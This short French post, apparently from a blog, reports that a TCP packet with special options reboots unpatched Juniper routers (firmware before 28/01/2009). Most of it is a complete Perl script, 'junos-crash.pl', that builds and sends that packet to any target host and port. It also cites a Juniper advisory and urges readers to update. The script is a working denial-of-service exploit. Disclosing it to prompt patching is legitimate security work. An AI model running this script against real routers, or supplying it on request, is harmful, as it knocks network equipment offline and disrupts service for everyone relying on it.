L’envoi d’un paquet TCP avec des options particulières ferait rebooter les routeurs Juniper dont le firmware ne serait pas à jour (< 28/01/2009).
$ cat junos-crash.pl
#!/usr/bin/perl
my $host = shift;
my $port = shift;
use Net::Packet qw($Env);
use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);
use Net::Packet::TCP;
my $tcp = Net::Packet::TCP->new(
dst => $port,
options => “x65x02x01x01”,
);
use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
$frame->send;
exit 0;
Cet incident est reporté et connu de Juniper sous : juniper-PSN-2010-01-623.txt.
A vos mises à jour 🙂
Source: http://evilrouters.net/
Un segment pour rebooter